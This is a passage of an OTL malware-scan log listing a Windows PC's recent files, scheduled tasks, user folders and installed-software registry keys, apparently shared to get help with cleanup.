[2018/12/05 14:33:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDS PRO
[2018/12/03 18:19:26 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\Documents\Pokemon
[2018/12/02 22:50:20 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\Documents\Minion Masters
[2018/12/02 22:00:31 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Games
[2018/12/01 21:19:51 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\AppData\Roaming\obs-studio
[2018/09/25 18:27:38 | 044,330,096 | ---- | C] (Online Media Technologies Ltd. ) -- C:\ProgramData\AppSetup.exe
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2018/12/31 11:38:55 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Thinkcentre\Desktop\OTL.exe
[2018/12/31 11:35:19 | 000,002,105 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes.lnk
[2018/12/31 10:01:17 | 000,624,640 | ---- | M] () -- C:\WINDOWS\SysNative\NetUtils2016.dll
[2018/12/31 10:00:37 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2018/12/31 09:58:32 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2018/12/30 19:52:24 | 000,000,202 | ---- | M] () -- C:\Users\Thinkcentre\Desktop\Dungeon Hunter Champions.url
[2018/12/30 10:54:15 | 000,002,360 | ---- | M] () -- C:\Users\Thinkcentre\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2018/12/29 18:05:58 | 000,907,160 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\NetUtils2016.sys
[2018/12/29 17:50:07 | 000,002,336 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2018/12/29 10:03:39 | 000,000,333 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Roaming\WB.CFG
[2018/12/29 09:31:05 | 000,002,514 | ---- | M] () -- C:\Users\Thinkcentre\Application Data\Microsoft\Internet Explorer\Quick Launch\Chromium.lnk
[2018/12/27 10:48:40 | 000,773,632 | ---- | M] () -- C:\WINDOWS\fpmxvfnppmmbjgzn.fpmxv
[2018/12/27 09:48:08 | 000,000,290 | RHS- | M] () -- C:\Users\Thinkcentre\ntuser.pol
[2018/12/27 09:45:52 | 000,000,300 | ---- | M] () -- C:\WINDOWS\tasks\SOVqgpLsuXhFCxp.job
[2018/12/26 11:43:21 | 000,003,346 | RHS- | M] () -- C:\ProgramData\ntuser.pol
[2018/12/26 11:42:37 | 000,083,784 | ---- | M] (Microsoft Corporation) -- C:\ProgramData\vcruntime140.dll
[2018/12/26 11:42:36 | 001,246,160 | ---- | M] (Mozilla Foundation) -- C:\ProgramData\nss3.dll
[2018/12/26 11:42:36 | 000,144,848 | ---- | M] (Mozilla Foundation) -- C:\ProgramData\softokn3.dll
[2018/12/26 11:42:35 | 000,440,120 | ---- | M] (Microsoft Corporation) -- C:\ProgramData\msvcp140.dll
[2018/12/26 11:42:34 | 000,137,168 | ---- | M] (Mozilla Foundation) -- C:\ProgramData\mozglue.dll
[2018/12/26 11:42:33 | 000,334,288 | ---- | M] (Mozilla Foundation) -- C:\ProgramData\freebl3.dll
[2018/12/26 11:42:33 | 000,016,384 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\dgkege.dll
[2018/12/25 18:32:50 | 000,101,732 | ---- | M] () -- C:\WINDOWS\uninstaller.dat
[2018/12/23 13:27:24 | 000,156,008 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\YzY2ZjJjNDBlYTIxM
[2018/12/19 15:51:35 | 000,000,202 | ---- | M] () -- C:\Users\Thinkcentre\Desktop\CreativeDestruction.url
[2018/12/09 13:10:59 | 000,002,285 | ---- | M] () -- C:\Users\Public\Desktop\REALTEK USB Wireless LAN Utility.lnk
[2018/12/09 09:42:08 | 005,298,050 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2018/12/09 09:42:08 | 002,650,576 | ---- | M] () -- C:\WINDOWS\SysNative\perfh00C.dat
[2018/12/09 09:42:08 | 001,244,322 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2018/12/09 09:42:08 | 000,705,642 | ---- | M] () -- C:\WINDOWS\SysNative\perfc00C.dat
[2018/12/09 09:42:08 | 000,622,460 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2018/12/08 13:31:15 | 000,001,618 | ---- | M] () -- C:\Users\Public\Desktop\Lecture à distance PS4.lnk
[2018/12/05 14:33:02 | 000,000,855 | ---- | M] () -- C:\Users\Public\Desktop\WinDS PRO.lnk
[2018/12/02 13:29:05 | 000,000,202 | ---- | M] () -- C:\Users\Thinkcentre\Desktop\Brawlhalla.url
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2018/12/31 11:33:46 | 000,002,105 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes.lnk
[2018/12/31 10:01:17 | 000,624,640 | ---- | C] () -- C:\WINDOWS\SysNative\NetUtils2016.dll
[2018/12/30 19:52:24 | 000,000,202 | ---- | C] () -- C:\Users\Thinkcentre\Desktop\Dungeon Hunter Champions.url
[2018/12/29 18:05:58 | 000,907,160 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\NetUtils2016.sys
[2018/12/29 17:50:07 | 000,002,377 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
[2018/12/29 17:50:07 | 000,002,360 | ---- | C] () -- C:\Users\Thinkcentre\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2018/12/29 17:50:07 | 000,002,336 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2018/12/27 10:48:40 | 000,773,632 | ---- | C] () -- C:\WINDOWS\fpmxvfnppmmbjgzn.fpmxv
[2018/12/27 09:48:07 | 000,000,290 | RHS- | C] () -- C:\Users\Thinkcentre\ntuser.pol
[2018/12/26 11:43:33 | 000,000,300 | ---- | C] () -- C:\WINDOWS\tasks\SOVqgpLsuXhFCxp.job
[2018/12/26 11:43:21 | 000,003,346 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2018/12/26 11:42:33 | 000,016,384 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\dgkege.dll
[2018/12/25 18:32:50 | 000,101,732 | ---- | C] () -- C:\WINDOWS\uninstaller.dat
[2018/12/23 13:27:24 | 000,156,008 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\YzY2ZjJjNDBlYTIxM
[2018/12/19 15:51:35 | 000,000,202 | ---- | C] () -- C:\Users\Thinkcentre\Desktop\CreativeDestruction.url
[2018/12/08 13:31:15 | 000,001,618 | ---- | C] () -- C:\Users\Public\Desktop\Lecture à distance PS4.lnk
[2018/12/08 13:31:15 | 000,001,618 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lecture à distance PS4.lnk
[2018/12/05 14:33:02 | 000,000,855 | ---- | C] () -- C:\Users\Public\Desktop\WinDS PRO.lnk
[2018/12/02 13:29:05 | 000,000,202 | ---- | C] () -- C:\Users\Thinkcentre\Desktop\Brawlhalla.url
[2018/11/25 13:34:17 | 000,451,072 | ---- | C] () -- C:\WINDOWS\SysWow64\ISSRemoveSP.exe
[2018/09/29 09:16:53 | 000,000,114 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Roaming\UniversalCompiler.ini
[2018/08/28 09:04:25 | 000,000,333 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Roaming\WB.CFG
[2018/06/17 08:52:09 | 000,000,032 | R--- | C] () -- C:\ProgramData\hash.dat
[2018/05/04 09:04:14 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2018/04/26 15:16:01 | 000,000,036 | ---- | C] () -- C:\WINDOWS\progress.ini
[2018/01/31 18:16:23 | 000,001,483 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\recently-used.xbel
[2017/12/18 18:50:13 | 000,044,760 | ---- | C] () -- C:\WINDOWS\runSW.exe
[2017/12/14 02:39:28 | 002,491,112 | ---- | C] () -- C:\WINDOWS\SysWow64\Windows.Mirage.dll
[2017/09/29 14:46:50 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2017/09/29 14:46:49 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2017/09/29 14:42:37 | 000,039,424 | ---- | C] () -- C:\WINDOWS\SysWow64\vmstaging.dll
[2017/09/29 14:42:27 | 000,017,143 | ---- | C] () -- C:\WINDOWS\SysWow64\srms-apr.dat
[2017/09/29 14:42:18 | 000,518,144 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2017/09/29 14:42:14 | 000,054,272 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2017/09/29 14:42:13 | 000,002,307 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2017/09/29 14:42:11 | 000,149,840 | ---- | C] () -- C:\WINDOWS\SysWow64\InputHost.dll
[2017/09/29 14:42:09 | 003,383,296 | ---- | C] () -- C:\WINDOWS\SysWow64\Windows.UI.Input.Inking.Analysis.dll
[2017/09/29 14:42:09 | 000,309,248 | ---- | C] () -- C:\WINDOWS\SysWow64\ssdm.dll
[2017/09/29 14:42:09 | 000,193,024 | ---- | C] () -- C:\WINDOWS\SysWow64\HeatCore.dll
[2017/09/29 14:42:09 | 000,092,160 | ---- | C] () -- C:\WINDOWS\SysWow64\WindowsDefaultHeatProcessor.dll
[2017/09/29 14:42:09 | 000,055,808 | ---- | C] () -- C:\WINDOWS\SysWow64\xboxgipsynthetic.dll
[2017/09/29 14:42:09 | 000,025,088 | ---- | C] () -- C:\WINDOWS\SysWow64\Windows.WARP.JITService.exe
[2017/09/29 14:42:08 | 000,167,640 | ---- | C] () -- C:\WINDOWS\SysWow64\chs_singlechar_pinyin.dat
[2017/09/29 14:42:00 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2017/09/29 14:41:54 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2017/08/10 18:18:32 | 000,000,232 | ---- | C] () -- C:\WINDOWS\SysWow64\dllhost.exe.config
[2017/07/31 22:35:03 | 000,000,066 | ---- | C] () -- C:\Users\Thinkcentre\inittk.ini
[2017/07/31 22:33:12 | 000,000,045 | ---- | C] () -- C:\Users\Thinkcentre\nuuid.ini
[2017/07/31 22:33:11 | 000,000,041 | ---- | C] () -- C:\Users\Thinkcentre\inst.ini
[2017/07/10 20:25:57 | 000,000,424 | ---- | C] () -- C:\WINDOWS\MAXLINK.INI
[2017/05/14 18:39:31 | 000,126,464 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\noah.dat
[2017/05/14 18:39:31 | 000,070,800 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\Config.xml
[2017/05/14 18:39:31 | 000,005,568 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\md.xml
[2017/05/14 18:39:30 | 007,290,368 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\agent.dat
[2017/05/14 18:39:30 | 001,894,851 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\Truestring.tst
[2017/05/14 18:36:02 | 000,140,800 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\installer.dat
[2017/05/10 15:48:34 | 000,022,912 | ---- | C] () -- C:\WINDOWS\xspirit.sys
[2017/05/06 09:27:54 | 000,014,779 | ---- | C] () -- C:\Users\Thinkcentre\toolbars001.png
[2017/05/06 09:27:42 | 000,014,779 | ---- | C] () -- C:\Users\Thinkcentre\toolbars000.png
[2017/05/06 09:27:32 | 000,033,795 | ---- | C] () -- C:\Users\Thinkcentre\fullwindow000.png
[2017/04/16 07:19:17 | 000,000,000 | ---- | C] () -- C:\ProgramData\DP45977C.lfl
[2017/04/14 18:34:33 | 000,276,800 | ---- | C] () -- C:\WINDOWS\SysWow64\D3DX8Wrapper.dll
[2016/11/10 20:28:38 | 000,007,598 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\Resmon.ResmonCfg
[2016/07/22 18:52:48 | 000,000,872 | ---- | C] () -- C:\ProgramData\SMRResults501.dat
[2016/07/06 10:43:39 | 000,000,016 | ---- | C] () -- C:\ProgramData\mntemp
[2016/05/25 16:49:38 | 000,003,584 | ---- | C] () -- C:\Users\Thinkcentre\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2018/05/11 20:02:37 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\windows.storage.dll -- [2018/03/30 05:53:57 | 007,676,304 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\windows.storage.dll -- [2018/03/30 05:19:23 | 006,092,152 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2017/09/29 14:42:05 | 000,964,096 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2017/09/29 14:42:18 | 000,769,536 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2018/02/10 05:35:43 | 000,506,368 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== LOP Check ==========[/color]

[2017/06/29 20:45:09 | 000,000,000 | ---D | M] -- C:\Users\Administrateur\AppData\Roaming\AVAST Software
[2017/12/13 16:42:04 | 000,000,000 | ---D | M] -- C:\Users\Administrateur\AppData\Roaming\Canon
[2017/08/15 14:37:56 | 000,000,000 | ---D | M] -- C:\Users\Administrateur\AppData\Roaming\GlarySoft
[2018/12/29 18:05:53 | 000,000,000 | ---D | M] -- C:\Users\Administrateur\AppData\Roaming\IObit
[2017/12/26 09:22:24 | 000,000,000 | ---D | M] -- C:\Users\Administrateur\AppData\Roaming\PlaysTV
[2017/12/26 09:21:29 | 000,000,000 | ---D | M] -- C:\Users\Administrateur\AppData\Roaming\Raptr
[2017/08/15 14:38:43 | 000,000,000 | ---D | M] -- C:\Users\Administrateur\AppData\Roaming\Stardock
[2017/07/13 15:32:52 | 000,000,000 | ---D | M] -- C:\Users\Administrateur\AppData\Roaming\TeamViewer
[2018/08/16 10:59:52 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\.mono
[2018/09/05 19:29:53 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\4kdownload.com
[2017/05/18 07:22:55 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\AVAST Software
[2018/10/28 14:42:49 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Battle.net
[2018/10/23 16:28:11 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Battlerite
[2018/10/19 15:46:28 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\BetterDiscord
[2018/08/04 17:17:22 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\BrawlhallaAir
[2018/12/21 21:29:21 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\CC
[2018/12/05 14:47:19 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Citra
[2018/08/18 17:06:55 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\CW
[2018/12/31 10:05:46 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\discord
[2018/11/17 21:25:22 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\EasyAntiCheat
[2018/10/29 11:18:15 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\edu.media.mit.Scratch2Editor
[2018/08/07 23:37:30 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Gameloft
[2018/08/20 12:42:53 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Gtarcade
[2018/10/28 14:49:36 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Guild Wars 2
[2018/07/31 13:10:46 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\InputMapper
[2018/12/29 18:12:15 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\IObit
[2018/08/20 12:43:27 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\LOA3
[2018/08/14 11:53:04 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\MechCAD
[2018/12/01 21:32:40 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\obs-studio
[2018/08/07 16:47:30 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\OpenOffice
[2018/07/23 07:37:29 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Parsec
[2018/08/17 11:48:48 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Pr1
[2018/08/14 15:25:23 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\RenPy
[2018/09/29 09:22:59 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\RyuFs
[2018/09/25 18:40:43 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Screaming Bee
[2018/12/31 10:45:56 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Spotify
[2018/09/14 17:32:29 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Stardock
[2018/07/29 09:14:25 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\SuperBoost
[2018/12/23 14:15:34 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\TeamViewer
[2018/09/30 17:30:07 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\TechSmith
[2018/05/11 19:54:19 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\Twitch
[2018/12/05 14:46:50 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Roaming\windspro

[color=#E56717]========== Purity Check ==========[/color]



[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< >[/color]
[2018/05/04 09:26:15 | 000,000,006 | -H-- | C] () -- C:\WINDOWS\Tasks\SA.DAT
[2018/08/17 12:03:30 | 000,000,570 | ---- | C] () -- C:\WINDOWS\Tasks\Yahoo! Powered dedar.job
[2018/12/26 11:43:33 | 000,000,300 | ---- | C] () -- C:\WINDOWS\Tasks\SOVqgpLsuXhFCxp.job

[color=#A23BEC]< HKCU\Software >[/color]
"TM" = 0102
"U_TM" = 0102
"U_DT" = 20160717
"U_SDT" =
"U_VER" = 3.21
"VP_HWID" = E0 93 91 82 E3 B1 8F E1 E2 82 A0 99 8A 8B AC AF A1 9F 8B 85 AA 8A E6 AB B1 93 86 A0 8A DF AF AC BD A3 98 A1 FE 94 BE 86 B7 99 A2 E8 34 63 65 00 [binary data]

[HKEY_CURRENT_USER\Software\4kdownload.com]

[HKEY_CURRENT_USER\Software\8floor]

[HKEY_CURRENT_USER\Software\A Sweet Studio]

[HKEY_CURRENT_USER\Software\AD]

[HKEY_CURRENT_USER\Software\Adobe]

[HKEY_CURRENT_USER\Software\Aeria Games]

[HKEY_CURRENT_USER\Software\Aion]

[HKEY_CURRENT_USER\Software\AJ Mouse]

[HKEY_CURRENT_USER\Software\Ankama]

[HKEY_CURRENT_USER\Software\AppDataLow]

[HKEY_CURRENT_USER\Software\Arconyx]

[HKEY_CURRENT_USER\Software\ATI]

[HKEY_CURRENT_USER\Software\Audiosurf, LLC]

[HKEY_CURRENT_USER\Software\AVAST Software]

[HKEY_CURRENT_USER\Software\AVS4YOU]

[HKEY_CURRENT_USER\Software\B2Expand]

[HKEY_CURRENT_USER\Software\baad dreamss]

[HKEY_CURRENT_USER\Software\BetaDwarf ApS]

[HKEY_CURRENT_USER\Software\Blizzard Entertainment]

[HKEY_CURRENT_USER\Software\Boneloaf]

[HKEY_CURRENT_USER\Software\Box]

[HKEY_CURRENT_USER\Software\BugSplat]

[HKEY_CURRENT_USER\Software\Burda]

[HKEY_CURRENT_USER\Software\CamexGames]

[HKEY_CURRENT_USER\Software\Canon]

[HKEY_CURRENT_USER\Software\Caphyon]

[HKEY_CURRENT_USER\Software\CarbonGames]

[HKEY_CURRENT_USER\Software\chaozz@work]

[HKEY_CURRENT_USER\Software\Chilkat Software, Inc.]

[HKEY_CURRENT_USER\Software\Chromium]

[HKEY_CURRENT_USER\Software\CINEMAX, s.r.o.]

[HKEY_CURRENT_USER\Software\Clever Endeavour Games]

[HKEY_CURRENT_USER\Software\Clients]

[HKEY_CURRENT_USER\Software\Cmune]

[HKEY_CURRENT_USER\Software\CpuCoreParking]

[HKEY_CURRENT_USER\Software\CpuCoreParkingManager]

[HKEY_CURRENT_USER\Software\Creaky Corpse Ltd]

[HKEY_CURRENT_USER\Software\Creta]

[HKEY_CURRENT_USER\Software\Critical Studio]

[HKEY_CURRENT_USER\Software\Cryptic]

[HKEY_CURRENT_USER\Software\Cryptozoic]

[HKEY_CURRENT_USER\Software\Cwavesoft]

[HKEY_CURRENT_USER\Software\Dashlane]

[HKEY_CURRENT_USER\Software\Dashlane_profiles]

[HKEY_CURRENT_USER\Software\DefaultCompany]

[HKEY_CURRENT_USER\Software\dexintgames]

[HKEY_CURRENT_USER\Software\Digital Extremes]

[HKEY_CURRENT_USER\Software\Diminished Studios]

[HKEY_CURRENT_USER\Software\Dire Wolf Digital]

[HKEY_CURRENT_USER\Software\Disc Soft]

[HKEY_CURRENT_USER\Software\Discord]

[HKEY_CURRENT_USER\Software\Dodge Roll]

[HKEY_CURRENT_USER\Software\Dohi Sweden]

[HKEY_CURRENT_USER\Software\Dolphin]

[HKEY_CURRENT_USER\Software\Dolphin Emulator]

[HKEY_CURRENT_USER\Software\DranyaStudio]

[HKEY_CURRENT_USER\Software\Dreamz]

[HKEY_CURRENT_USER\Software\Drivers]

[HKEY_CURRENT_USER\Software\Dropbox]

[HKEY_CURRENT_USER\Software\DropboxUpdate]

[HKEY_CURRENT_USER\Software\DuoDianApp]

[HKEY_CURRENT_USER\Software\DXTransform]

[HKEY_CURRENT_USER\Software\Eforb]

[HKEY_CURRENT_USER\Software\Electronic Arts]

[HKEY_CURRENT_USER\Software\Emulators]

[HKEY_CURRENT_USER\Software\ENMASSE]

[HKEY_CURRENT_USER\Software\Epic Games]

[HKEY_CURRENT_USER\Software\epsxe]

[HKEY_CURRENT_USER\Software\EXE Games]

[HKEY_CURRENT_USER\Software\ExtendOffice]

[HKEY_CURRENT_USER\Software\Firefox]

[HKEY_CURRENT_USER\Software\Floor]

[HKEY_CURRENT_USER\Software\Flute]

[HKEY_CURRENT_USER\Software\FredaikisAB]

[HKEY_CURRENT_USER\Software\Freejam]

[HKEY_CURRENT_USER\Software\Freemake]

[HKEY_CURRENT_USER\Software\FreeReign]

[HKEY_CURRENT_USER\Software\FXhome]

[HKEY_CURRENT_USER\Software\Gaijin]

[HKEY_CURRENT_USER\Software\GameCenter]

[HKEY_CURRENT_USER\Software\Gameforge4d]

[HKEY_CURRENT_USER\Software\Gameloft]

[HKEY_CURRENT_USER\Software\Gamers for Good]

[HKEY_CURRENT_USER\Software\GameScience]

[HKEY_CURRENT_USER\Software\GEIM.PRO]

[HKEY_CURRENT_USER\Software\Genius2]

[HKEY_CURRENT_USER\Software\Glarysoft]

[HKEY_CURRENT_USER\Software\GOG.com]

[HKEY_CURRENT_USER\Software\Google]

[HKEY_CURRENT_USER\Software\gtarcade]

[HKEY_CURRENT_USER\Software\Haali]

[HKEY_CURRENT_USER\Software\heheelibom]

[HKEY_CURRENT_USER\Software\HEX Entertainment]

[HKEY_CURRENT_USER\Software\HmelyoffLabs]

[HKEY_CURRENT_USER\Software\HngSync]

[HKEY_CURRENT_USER\Software\Hoplon Infotainment]

[HKEY_CURRENT_USER\Software\IGA]

[HKEY_CURRENT_USER\Software\IM Providers]

[HKEY_CURRENT_USER\Software\Imagination Technologies]

[HKEY_CURRENT_USER\Software\INCAInternet]

[HKEY_CURRENT_USER\Software\Infernum]

[HKEY_CURRENT_USER\Software\Intel]

[HKEY_CURRENT_USER\Software\IObit]

[HKEY_CURRENT_USER\Software\JaboSoft]

[HKEY_CURRENT_USER\Software\JavaSoft]

[HKEY_CURRENT_USER\Software\JC]

[HKEY_CURRENT_USER\Software\Joe Williams]

[HKEY_CURRENT_USER\Software\kde.org]

[HKEY_CURRENT_USER\Software\KFriske Studios]

[HKEY_CURRENT_USER\Software\Konami Digital Entertainment Co., Ltd.]

[HKEY_CURRENT_USER\Software\L2j Community Network]

[HKEY_CURRENT_USER\Software\League of Geeks]

[HKEY_CURRENT_USER\Software\Leawo Software]

[HKEY_CURRENT_USER\Software\Legend Studio]

[HKEY_CURRENT_USER\Software\Licenses]

[HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications]

[HKEY_CURRENT_USER\Software\Logitech]

[HKEY_CURRENT_USER\Software\Macromedia]

[HKEY_CURRENT_USER\Software\Madbyte]

[HKEY_CURRENT_USER\Software\MADFINGER Games, a.s.]

[HKEY_CURRENT_USER\Software\MAGIX]

[HKEY_CURRENT_USER\Software\MAIET Entertainment]

[HKEY_CURRENT_USER\Software\MainConcept]

[HKEY_CURRENT_USER\Software\MakeMKV]

[HKEY_CURRENT_USER\Software\Malwarebytes]

[HKEY_CURRENT_USER\Software\Matrox]

[HKEY_CURRENT_USER\Software\MC4D]

[HKEY_CURRENT_USER\Software\MechCAD]

[HKEY_CURRENT_USER\Software\Microsoft]

[HKEY_CURRENT_USER\Software\Microsoft Studios]

[HKEY_CURRENT_USER\Software\Mirillis]

[HKEY_CURRENT_USER\Software\momoStorm]

[HKEY_CURRENT_USER\Software\Mozilla]

[HKEY_CURRENT_USER\Software\MozillaPlugins]

[HKEY_CURRENT_USER\Software\Mumble]

[HKEY_CURRENT_USER\Software\N64 Emulation]

[HKEY_CURRENT_USER\Software\Ndemic Creations]

[HKEY_CURRENT_USER\Software\Neople]

[HKEY_CURRENT_USER\Software\Netscape]

[HKEY_CURRENT_USER\Software\NewZ]

[HKEY_CURRENT_USER\Software\Nexon]

[HKEY_CURRENT_USER\Software\NezhaGames]

[HKEY_CURRENT_USER\Software\Nico Mak Computing]

[HKEY_CURRENT_USER\Software\NLDT]

[HKEY_CURRENT_USER\Software\NVIDIA Corporation]

[HKEY_CURRENT_USER\Software\O&O]

[HKEY_CURRENT_USER\Software\ODBC]

[HKEY_CURRENT_USER\Software\Open Media LLC]

[HKEY_CURRENT_USER\Software\OpenOffice]

[HKEY_CURRENT_USER\Software\Opera Software]

[HKEY_CURRENT_USER\Software\osu!]

[HKEY_CURRENT_USER\Software\PACE Anti-Piracy]

[HKEY_CURRENT_USER\Software\Parsec_Media]

[HKEY_CURRENT_USER\Software\Piriform]

[HKEY_CURRENT_USER\Software\Pixart]

[HKEY_CURRENT_USER\Software\PlayfulCorp]

[HKEY_CURRENT_USER\Software\Playnet]

[HKEY_CURRENT_USER\Software\PlaysTV]

[HKEY_CURRENT_USER\Software\Policies]

[HKEY_CURRENT_USER\Software\Pritc]

[HKEY_CURRENT_USER\Software\PROTeam]

[HKEY_CURRENT_USER\Software\ProtectedStorage]

[HKEY_CURRENT_USER\Software\Psiphon3]

[HKEY_CURRENT_USER\Software\PSXTeam]

[HKEY_CURRENT_USER\Software\PUSH Entertainment]

[HKEY_CURRENT_USER\Software\QtProject]

[HKEY_CURRENT_USER\Software\Quizo]

[HKEY_CURRENT_USER\Software\Raptr]

